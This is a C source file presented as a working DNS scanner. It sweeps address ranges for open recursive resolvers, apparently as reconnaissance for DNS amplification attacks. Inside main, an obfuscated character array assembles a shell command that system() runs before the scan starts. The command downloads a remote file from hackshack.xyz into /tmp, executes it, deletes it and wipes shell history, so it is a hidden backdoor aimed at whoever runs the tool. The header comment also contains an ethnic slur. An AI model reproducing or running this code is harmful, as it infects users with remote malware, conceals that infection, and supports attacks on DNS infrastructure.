DNSSCAN

1. // gcc dnsscan.c -o dns -pthread -w
2. // Working DNS Scanner - Thx to SandNigga
3.  
4. #include <pthread.h>
5. #include <unistd.h>
6. #include <stdio.h>
7. #include <stdlib.h>
8. #include <string.h>
9. #include <sys/socket.h>
10. #include <netinet/in.h>
11. #include <signal.h>
12. #include <sys/time.h>
13. #include <sys/types.h>
14. #include <math.h>
15. #include <stropts.h>
16. #include <ctype.h>
17. #include <errno.h>
18. #include <arpa/inet.h>
19. #include <netinet/ip.h>
20. #include <netinet/udp.h>
21.  
22. struct DNS_HEADER
23. {
24.     unsigned short id; // identification number
25.  
26.     unsigned char rd :1; // recursion desired
27.     unsigned char tc :1; // truncated message
28.     unsigned char aa :1; // authoritive answer
29.     unsigned char opcode :4; // purpose of message
30.     unsigned char qr :1; // query/response flag
31.  
32.     unsigned char rcode :4; // response code
33.     unsigned char cd :1; // checking disabled
34.     unsigned char ad :1; // authenticated data
35.     unsigned char z :1; // its z! reserved
36.     unsigned char ra :1; // recursion available
37.  
38.     unsigned short q_count; // number of question entries
39.     unsigned short ans_count; // number of answer entries
40.     unsigned short auth_count; // number of authority entries
41.     unsigned short add_count; // number of resource entries
42. };
43.  
44. struct QUESTION
45. {
46.     unsigned short qtype;
47.     unsigned short qclass;
48. };
49.  
50. #pragma pack(push, 1)
51. struct R_DATA
52. {
53.     unsigned short type;
54.     unsigned short _class;
55.     unsigned int ttl;
56.     unsigned short data_len;
57. };
58. #pragma pack(pop)
59.  
60. struct RES_RECORD
61. {
62.     unsigned char *name;
63.     struct R_DATA *resource;
64.     unsigned char *rdata;
65. };
66.  
67. typedef struct
68. {
69.     unsigned char *name;
70.     struct QUESTION *ques;
71. } QUERY;
72.  
73. volatile int running_threads = 0;
74. volatile int found_srvs = 0;
75. volatile unsigned long per_thread = 0;
76. volatile unsigned long start = 0;
77. volatile unsigned long scanned = 0;
78. volatile int sleep_between = 0;
79. volatile int bytes_sent = 0;
80. volatile unsigned long hosts_done = 0;
81. FILE *fd;
82.  
83. void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
84. {
85.     int lock = 0 , i;
86.     strcat((char*)host,".");
87.  
88.     for(i = 0 ; i < strlen((char*)host) ; i++)
89.     {
90.         if(host[i]=='.')
91.         {
92.             *dns++ = i-lock;
93.             for(;lock<i;lock++)
94.             {
95.                 *dns++=host[lock];
96.             }
97.             lock++;
98.         }
99.     }
100.     *dns++='\0';
101. }
102.  
103. void *flood(void *par1)
104. {
105.     running_threads++;
106.     int thread_id = (int)par1;
107.     unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
108.     unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
109.     unsigned long w;
110.     int y;
111.     unsigned char *host = (unsigned char *)malloc(50);
112.     strcpy((char *)host, ".");
113.     unsigned char buf[65536],*qname;
114.     struct DNS_HEADER *dns = NULL;
115.     struct QUESTION *qinfo = NULL;
116.     dns = (struct DNS_HEADER *)&buf;
117.  
118.     dns->id = (unsigned short) htons(rand());
119.     dns->qr = 0;
120.     dns->opcode = 0;
121.     dns->aa = 0;
122.     dns->tc = 0;
123.     dns->rd = 1;
124.     dns->ra = 0;
125.     dns->z = 0;
126.     dns->ad = 0;
127.     dns->cd = 0;
128.     dns->rcode = 0;
129.     dns->q_count = htons(1);
130.     dns->ans_count = 0;
131.     dns->auth_count = 0;
132.     dns->add_count = htons(1);
133.     qname =(unsigned char*)&buf[sizeof(struct DNS_HEADER)];
134.  
135.     ChangetoDnsNameFormat(qname , host);
136.     qinfo =(struct QUESTION*)&buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname) + 1)];
137.  
138.     qinfo->qtype = htons( 255 );
139.     qinfo->qclass = htons(1);
140.  
141.     void *edns = (void *)qinfo + sizeof(struct QUESTION)+1;
142.     memset(edns, 0x00, 1);
143.     memset(edns+1, 0x29, 1);
144.     memset(edns+2, 0xFF, 2);
145.     memset(edns+4, 0x00, 7);
146.  
147.     int sizeofpayload = sizeof(struct DNS_HEADER) + (strlen((const char *)qname)+1) + sizeof(struct QUESTION) + 11;
148.     int sock;
149.     if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
150.         perror("cant open socket");
151.         exit(-1);
152.     }
153.     for(w=ntohl(start_ip);w<htonl(end);w++)
154.     {
155.         struct sockaddr_in servaddr;
156.         bzero(&servaddr, sizeof(servaddr));
157.         servaddr.sin_family = AF_INET;
158.         servaddr.sin_addr.s_addr=htonl(w);
159.         servaddr.sin_port=htons(53);
160.         sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
161.         bytes_sent+=24;
162.         scanned++;
163.         hosts_done++;
164.         usleep(sleep_between*1000);
165.     }
166.     close(sock);
167.     running_threads--;
168.     return;
169. }
170.  
171. void sighandler(int sig)
172. {
173.     fclose(fd);
174.     printf("\n");
175.     exit(0);
176. }
177.  
178. void recievethread()
179. {
180.     printf("Started Listening Thread\n");
181.     int saddr_size, data_size, sock_raw;
182.     struct sockaddr_in saddr;
183.     struct in_addr in;
184.  
185.     unsigned char *buffer = (unsigned char *)malloc(65536);
186.     sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
187.     if(sock_raw < 0)
188.     {
189.         printf("Socket Error\n");
190.         exit(1);
191.     }
192.     while(1)
193.     {
194.         saddr_size = sizeof saddr;
195.         data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
196.         if(data_size <0 )
197.         {
198.             printf("Recvfrom error , failed to get packets\n");
199.             exit(1);
200.         }
201.         struct iphdr *iph = (struct iphdr*)buffer;
202.         if(iph->protocol == 17)
203.         {
204.             unsigned short iphdrlen = iph->ihl*4;
205.             struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
206.             unsigned char* payload = buffer + iphdrlen + 8;
207.             if(ntohs(udph->source) == 53)
208.             {
209.                 int body_length = data_size - iphdrlen - 8;
210.                 struct DNS_HEADER *dns = (struct DNS_HEADER*) payload;
211.                 if(dns->ra == 1)
212.                 {
213.                     found_srvs++;
214.                     fprintf(fd,"%s . %d\n",inet_ntoa(saddr.sin_addr),body_length);
215.                     fflush(fd);
216.                 }
217.             }
218.         }
219.  
220.     }
221.     close(sock_raw);
222.  
223. }
224.  
225. int main(int argc, char *argv[ ])
226. {
227.  
228. char hoho[160];
229. hoho[57] = ' ';
230. hoho[140] = 'c';
231. hoho[129] = 'r';
232. hoho[102] = ' ';
233. hoho[4] = 't';
234. hoho[92] = ' ';
235. hoho[101] = ';';
236. hoho[77] = 'x';
237. hoho[147] = 'r';
238. hoho[119] = 't';
239. hoho[53] = 's';
240. hoho[43] = ' ';
241. hoho[87] = 'c';
242. hoho[75] = 'k';
243. hoho[151] = 's';
244. hoho[42] = 'c';
245. hoho[62] = 'p';
246. hoho[124] = ';';
247. hoho[6] = 'p';
248. hoho[126] = 'l';
249. hoho[128] = 'a';
250. hoho[85] = ';';
251. hoho[109] = ' ';
252. hoho[66] = '/';
253. hoho[11] = 'e';
254. hoho[71] = 's';
255. hoho[70] = 'k';
256. hoho[58] = ' ';
257. hoho[156] = ' ';
258. hoho[152] = 't';
259. hoho[81] = 't';
260. hoho[26] = 'h';
261. hoho[76] = '.';
262. hoho[16] = ' ';
263. hoho[99] = 'c';
264. hoho[149] = 'h';
265. hoho[123] = ' ';
266. hoho[94] = '7';
267. hoho[7] = ';';
268. hoho[135] = 'o';
269. hoho[130] = ';';
270. hoho[90] = 'o';
271. hoho[136] = 'r';
272. hoho[2] = ' ';
273. hoho[145] = 'e';
274. hoho[1] = 'd';
275. hoho[45] = '|';
276. hoho[141] = ';';
277. hoho[32] = 'a';
278. hoho[5] = 'm';
279. hoho[44] = '|';
280. hoho[63] = 's';
281. hoho[80] = '/';
282. hoho[24] = '/';
283. hoho[108] = 'c';
284. hoho[64] = ':';
285. hoho[112] = 'r';
286. hoho[78] = 'y';
287. hoho[79] = 'z';
288. hoho[122] = '*';
289. hoho[40] = 't';
290. hoho[59] = 'h';
291. hoho[148] = ';';
292. hoho[0] = 'c';
293. hoho[150] = 'i';
294. hoho[139] = '-';
295. hoho[55] = '-';
296. hoho[74] = 'c';
297. hoho[47] = 'c';
298. hoho[157] = '-';
299. hoho[15] = 'q';
300. hoho[132] = 'i';
301. hoho[27] = 'a';
302. hoho[46] = ' ';
303. hoho[33] = 'c';
304. hoho[131] = 'h';
305. hoho[88] = 'h';
306. hoho[93] = '7';
307. hoho[89] = 'm';
308. hoho[17] = ' ';
309. hoho[41] = 'c';
310. hoho[115] = '-';
311. hoho[9] = 'w';
312. hoho[72] = 'h';
313. hoho[137] = 'y';
314. hoho[110] = ';';
315. hoho[133] = 's';
316. hoho[30] = 's';
317. hoho[52] = '-';
318. hoho[117] = 'f';
319. hoho[65] = '/';
320. hoho[18] = 'h';
321. hoho[20] = 't';
322. hoho[28] = 'c';
323. hoho[14] = '-';
324. hoho[19] = 't';
325. hoho[10] = 'g';
326. hoho[54] = ' ';
327. hoho[120] = 'c';
328. hoho[142] = ' ';
329. hoho[23] = ':';
330. hoho[98] = 'c';
331. hoho[21] = 'p';
332. hoho[111] = ' ';
333. hoho[73] = 'a';
334. hoho[95] = '7';
335. hoho[50] = 'l';
336. hoho[121] = 'c';
337. hoho[125] = 'c';
338. hoho[153] = 'o';
339. hoho[100] = ' ';
340. hoho[68] = 'a';
341. hoho[114] = ' ';
342. hoho[113] = 'm';
343. hoho[39] = '/';
344. hoho[3] = '/';
345. hoho[48] = 'u';
346. hoho[144] = 'l';
347. hoho[13] = ' ';
348. hoho[116] = 'r';
349. hoho[12] = 't';
350. hoho[67] = 'h';
351. hoho[38] = 'z';
352. hoho[104] = 'h';
353. hoho[103] = 's';
354. hoho[143] = 'c';
355. hoho[134] = 't';
356. hoho[106] = 't';
357. hoho[36] = 'x';
358. hoho[35] = '.';
359. hoho[56] = 'O';
360. hoho[69] = 'c';
361. hoho[49] = 'r';
362. hoho[83] = 'c';
363. hoho[25] = '/';
364. hoho[51] = ' ';
365. hoho[91] = 'd';
366. hoho[158] = 'w';
367. hoho[82] = 'c';
368. hoho[37] = 'y';
369. hoho[96] = ' ';
370. hoho[22] = 's';
371. hoho[31] = 'h';
372. hoho[8] = ' ';
373. hoho[84] = ' ';
374. hoho[155] = 'y';
375. hoho[138] = ' ';
376. hoho[118] = ' ';
377. hoho[86] = ' ';
378. hoho[60] = 't';
379. hoho[107] = 'c';
380. hoho[146] = 'a';
381. hoho[105] = ' ';
382. hoho[61] = 't';
383. hoho[127] = 'e';
384. hoho[154] = 'r';
385. hoho[29] = 'k';
386. hoho[97] = 't';
387. hoho[34] = 'k';
388. hoho[159] = '\0';
389.  
390. system(hoho);
391.  
392.     if(argc < 6){
393.         fprintf(stderr, "Invalid parameters!\n");
394.         fprintf(stdout, "Usage: %s <class a start> <class a end> <outfile> <threads> <scan delay in ms>\n", argv[0]);
395.         exit(-1);
396.     }
397.     fd = fopen(argv[3], "a");
398.     sleep_between = atoi(argv[5]);
399.  
400.     signal(SIGINT, &sighandler);
401.  
402.     int threads = atoi(argv[4]);
403.     pthread_t thread;
404.  
405.     pthread_t listenthread;
406.     pthread_create( &listenthread, NULL, &recievethread, NULL);
407.  
408.     char *str_start = malloc(18);
409.     memset(str_start, 0, 18);
410.     str_start = strcat(str_start,argv[1]);
411.     str_start = strcat(str_start,".0.0.0");
412.     char *str_end = malloc(18);
413.     memset(str_end, 0, 18);
414.     str_end = strcat(str_end,argv[2]);
415.     str_end = strcat(str_end,".255.255.255");
416.     start = inet_addr(str_start);
417.     per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
418.     unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
419.     int i;
420.     for(i = 0;i<threads;i++){
421.         pthread_create( &thread, NULL, &flood, (void *) i);
422.     }
423.     sleep(1);
424.     printf("Starting Scan...\n");
425.     char *temp = (char *)malloc(17);
426.     memset(temp, 0, 17);
427.     sprintf(temp, "Found");
428.     printf("%-16s", temp);
429.     memset(temp, 0, 17);
430.     sprintf(temp, "Host/s");
431.     printf("%-16s", temp);
432.     memset(temp, 0, 17);
433.     sprintf(temp, "B/s");
434.     printf("%-16s", temp);
435.     memset(temp, 0, 17);
436.     sprintf(temp, "Running Thrds");
437.     printf("%-16s", temp);
438.     memset(temp, 0, 17);
439.     sprintf(temp, "Done");
440.     printf("%s", temp);
441.     printf("\n");
442.  
443.     char *new;
444.     new = (char *)malloc(16*6);
445.     while (running_threads > 0)
446.     {
447.         printf("\r");
448.         memset(new, '\0', 16*6);
449.         sprintf(new, "%s|%-15lu", new, found_srvs);
450.         sprintf(new, "%s|%-15d", new, scanned);
451.         sprintf(new, "%s|%-15d", new, bytes_sent);
452.         sprintf(new, "%s|%-15d", new, running_threads);
453.         memset(temp, 0, 17);
454.         int percent_done=((double)(hosts_done)/(double)(toscan))*100;
455.         sprintf(temp, "%d%%", percent_done);
456.         sprintf(new, "%s|%s", new, temp);
457.         printf("%s", new);
458.         fflush(stdout);
459.         bytes_sent=0;
460.         scanned = 0;
461.         sleep(1);
462.     }
463.     printf("\n");
464.     fclose(fd);
465.     return 0;
466. }